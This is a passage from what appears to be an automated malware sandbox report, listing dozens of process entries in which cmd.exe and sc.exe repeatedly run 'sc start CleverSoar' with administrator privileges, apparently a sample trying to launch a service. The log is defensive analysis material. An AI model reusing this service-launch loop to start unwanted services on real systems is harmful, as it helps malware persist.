                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:19
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:20
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:21
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:22
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:23
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:24
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:25
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:26
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:27
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:28
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:29
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:30
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:31
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:32
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:33
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:34
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:35
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:36
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:37
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:38
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:39
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:40
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:41
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:42
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:43
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:44
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:45
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:46
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:47
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:48
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:49
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:50
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:51
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:52
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:53
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:54
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:55
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:56
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:57
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:58
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:59
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:60
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff7403e0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:61
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:62
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:63
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:64
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:65
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:66
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:67
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:68
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:69
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:70
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:71
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:72
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:73
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:74
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:75
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:76
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:77
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:78
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:79
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:80
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:81
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:82
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:83
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:84
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:85
                                        Start time:03:24:19
                                        Start date:23/12/2024
